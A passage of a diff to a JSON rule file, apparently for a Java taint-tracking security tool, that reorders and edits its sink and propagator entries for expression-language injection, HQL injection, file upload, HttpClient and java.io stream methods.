"track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.springframework.web.multipart.MultipartFile.getOriginalFilename()" - } - ], - "enable": 1, - "type": 1, - "value": "fileupload" - }, - { - "details": [ + "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.createFilter(java.lang.Object,java.lang.String)" + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.createQuery(java.lang.String)" + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String)" + "value": "ognl.Ognl.parseExpression(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String,java.lang.Class)" + "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String[],java.lang.Class[])" + "value": "org.springframework.expression.Expression.getValue()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String)" + "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String)" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String)" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String)" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.SharedSessionContract.createQuery(java.lang.String)" - }, + "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "expression-language-injection" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.hibernate.SharedSessionContract.createSQLQuery(java.lang.String)" + "value": "org.apache.commons.fileupload.FileItem.getName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.hibernate.criterion.Expression.sql(java.lang.String)" + "value": "org.springframework.web.multipart.MultipartFile.getName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.hibernate.criterion.Expression.sql(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" - }, + "value": "org.springframework.web.multipart.MultipartFile.getOriginalFilename()" + } + ], + "enable": 1, + "type": 1, + "value": "fileupload" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String)" + "value": "org.hibernate.Session.createFilter(java.lang.Object,java.lang.String)" }, { "command": "", @@ -5560,7 +5711,7 @@ "target": "", "track": "true", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "org.hibernate.Session.createQuery(java.lang.String)" }, { "command": "", @@ -5573,7 +5724,7 @@ "target": "", "track": "true", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.hibernate.Session.createSQLQuery(java.lang.String)" }, { "command": "", @@ -5586,7 +5737,7 @@ "target": "", "track": "true", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String)" + "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String,java.lang.Class)" }, { "command": "", @@ -5599,7 +5750,7 @@ "target": "", "track": "true", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.Class)" + "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String[],java.lang.Class[])" }, { "command": "", @@ -5612,304 +5763,290 @@ "target": "", "track": "true", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "hql-injection" - }, - { - "details": [ + "value": "org.hibernate.Session.delete(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.http.entity.ByteArrayEntity.(byte[],int,int,org.apache.http.entity.ContentType)" + "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.http.entity.ByteArrayEntity.(byte[],org.apache.http.entity.ContentType)" + "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.http.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.http.entity.ContentType)" + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.http.entity.StringEntity.(java.lang.String,java.lang.String,java.lang.String)" + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.http.entity.StringEntity.(java.lang.String,org.apache.http.entity.ContentType)" - } - ], - "enable": 1, - "type": 1, - "value": "httpclient" - }, - { - "details": [ + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],int,int,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + "value": "org.hibernate.Session.find(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.hc.core5.http.ContentType,java.lang.String)" + "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.StringEntity.(java.lang.String,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" - } - ], - "enable": 1, - "type": 1, - "value": "httpclient5" - }, - { - "details": [ + "value": "org.hibernate.Session.iterate(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.BufferedReader.(java.io.InputStreamReader)" + "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.BufferedReader.(java.io.Reader)" + "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.BufferedReader.(java.io.Reader,int)" + "value": "org.hibernate.SharedSessionContract.createQuery(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.BufferedReader.readLine()" + "value": "org.hibernate.SharedSessionContract.createSQLQuery(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayInputStream.(byte[])" + "value": "org.hibernate.criterion.Expression.sql(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayInputStream.(byte[],int,int)" + "value": "org.hibernate.criterion.Expression.sql(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { - "command": "REMOVE()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.reset()" + "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.toByteArray()" + "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString()" + "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(int)" + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(java.lang.String)" + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.Class)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "java.io.ByteArrayOutputStream.toString(java.nio.charset.Charset)" - }, + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "hql-injection" + }, + { + "details": [ { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", @@ -5917,9 +6054,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "java.io.ByteArrayOutputStream.write(byte[],int,int)" + "value": "org.apache.http.entity.ByteArrayEntity.(byte[],int,int,org.apache.http.entity.ContentType)" }, { "command": "", @@ -5930,12 +6067,12 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.(char[])" + "value": "org.apache.http.entity.ByteArrayEntity.(byte[],org.apache.http.entity.ContentType)" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", @@ -5943,22 +6080,22 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.(char[],int,int)" + "value": "org.apache.http.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.http.entity.ContentType)" }, { - "command": "INSERT(0,P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P1", - "track": "", + "target": "O", + "track": "false", "untags": [], - "value": "java.io.CharArrayReader.read(char[],int,int)" + "value": "org.apache.http.entity.StringEntity.(java.lang.String,java.lang.String,java.lang.String)" }, { "command": "", @@ -5969,10 +6106,17 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "java.io.FileReader.(java.io.File)" - }, + "value": "org.apache.http.entity.StringEntity.(java.lang.String,org.apache.http.entity.ContentType)" + } + ], + "enable": 1, + "type": 1, + "value": "httpclient" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, @@ -5982,49 +6126,56 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "java.io.InputStream.(java.io.InputStream)" + "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],int,int,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "O", "track": "false", "untags": [], - "value": "java.io.InputStream.read(byte[])" + "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P1", - "track": "", + "target": "O", + "track": "false", "untags": [], - "value": "java.io.InputStream.read(byte[],int,int)" + "value": "org.apache.hc.core5.http.io.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.hc.core5.http.ContentType,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "O", "track": "false", "untags": [], - "value": "java.io.InputStream.transferTo(java.io.OutputStream)" - }, + "value": "org.apache.hc.core5.http.io.entity.StringEntity.(java.lang.String,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + } + ], + "enable": 1, + "type": 1, + "value": "httpclient5" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, @@ -6036,7 +6187,7 @@ "target": "O", "track": "", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream)" + "value": "java.io.BufferedReader.(java.io.InputStreamReader)" }, { "command": "", @@ -6047,9 +6198,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" + "value": "java.io.BufferedReader.(java.io.Reader)" }, { "command": "", @@ -6062,7 +6213,7 @@ "target": "O", "track": "", "untags": [], - "value": "java.io.InputStreamReader.(java.io.InputStream,java.nio.charset.Charset)" + "value": "java.io.BufferedReader.(java.io.Reader,int)" }, { "command": "", @@ -6072,36 +6223,23 @@ "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "R", "track": "", "untags": [], - "value": "java.io.InputStreamReader.read(char[],int,int)" + "value": "java.io.BufferedReader.readLine()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "java.io.ObjectInputStream.(java.io.InputStream)" - }, - { - "command": "INSERT(0,P2,P3)", - "ignore_blacklist": false, - "ignore_internal": false, "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.PipedInputStream.read(byte[],int,int)" + "value": "java.io.ByteArrayInputStream.(byte[])" }, { "command": "", @@ -6112,90 +6250,90 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.PipedInputStream.receive(byte[],int,int)" + "value": "java.io.ByteArrayInputStream.(byte[],int,int)" }, { - "command": "INSERT(0,P2,P3)", + "command": "REMOVE()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.PipedReader.read(char[],int,int)" + "value": "java.io.ByteArrayOutputStream.reset()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "java.io.PipedReader.receive(char[],int,int)" + "value": "java.io.ByteArrayOutputStream.toByteArray()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.io.PushbackInputStream.(java.io.InputStream,int)" + "value": "java.io.ByteArrayOutputStream.toString()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "R", "track": "false", "untags": [], - "value": "java.io.PushbackInputStream.read(byte[],int,int)" + "value": "java.io.ByteArrayOutputStream.toString(int)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "R", "track": "false", "untags": [], - "value": "java.io.Reader.read(char[])" + "value": "java.io.ByteArrayOutputStream.toString(java.lang.String)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "P1", + "target": "R", "track": "false", "untags": [], - "value": "java.io.Reader.transferTo(java.io.Writer)" + "value": "java.io.ByteArrayOutputStream.toString(java.nio.charset.Charset)" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", @@ -6205,23 +6343,23 @@ "target": "O", "track": "", "untags": [], - "value": "java.io.StringReader.(java.lang.String)" + "value": "java.io.ByteArrayOutputStream.write(byte[],int,int)" }, { - "command": "KEEP()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "O", + "track": "", "untags": [], - "value": "java.io.StringWriter.toString()" + "value": "java.io.CharArrayReader.(char[])" }, { - "command": "APPEND(P2,P3)", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", @@ -6229,25 +6367,25 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.StringWriter.write(char[],int,int)" + "value": "java.io.CharArrayReader.(char[],int,int)" }, { - "command": "APPEND()", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "P1", + "track": "", "untags": [], - "value": "java.io.StringWriter.write(java.lang.String)" + "value": "java.io.CharArrayReader.read(char[],int,int)" }, { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", @@ -6255,9 +6393,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "java.io.StringWriter.write(java.lang.String,int,int)" + "value": "java.io.FileReader.(java.io.File)" }, { "command": "", @@ -6270,7 +6408,7 @@ "target": "O", "track": "", "untags": [], - "value": "java.net.Socket.(java.lang.String,int)" + "value": "java.io.InputStream.(java.io.InputStream)" }, { "command": "", @@ -6280,121 +6418,114 @@ "source": "O", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "P1", + "track": "false", "untags": [], - "value": "java.net.Socket.getOutputStream()" + "value": "java.io.InputStream.read(byte[])" }, { - "command": "REMOVE()", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "false", + "target": "P1", + "track": "", "untags": [], - "value": "org.apache.commons.io.output.ByteArrayOutputStream.reset()" + "value": "java.io.InputStream.read(byte[],int,int)" }, { - "command": "APPEND(P2,P3)", + "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "P1", "track": "false", "untags": [], - "value": "org.apache.commons.io.output.ByteArrayOutputStream.write(byte[],int,int)" - } - ], - "enable": 1, - "type": 1, - "value": "io" - }, - { - "details": [ + "value": "java.io.InputStream.transferTo(java.io.OutputStream)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "O", "track": "", "untags": [], - "value": "javax.xml.bind.JAXBElement.getValue()" + "value": "java.io.InputStreamReader.(java.io.InputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "O", + "track": "false", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream)" + "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "O", "track": "", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream,java.lang.String)" + "value": "java.io.InputStreamReader.(java.io.InputStream,java.nio.charset.Charset)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "P1", "track": "", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.InputStream)" + "value": "java.io.InputStreamReader.read(char[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "O", "track": "", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.Reader)" + "value": "java.io.ObjectInputStream.(java.io.InputStream)" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "O", + "track": "false", "untags": [], - "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(javax.xml.transform.Source)" + "value": "java.io.PipedInputStream.read(byte[],int,int)" }, { "command": "", 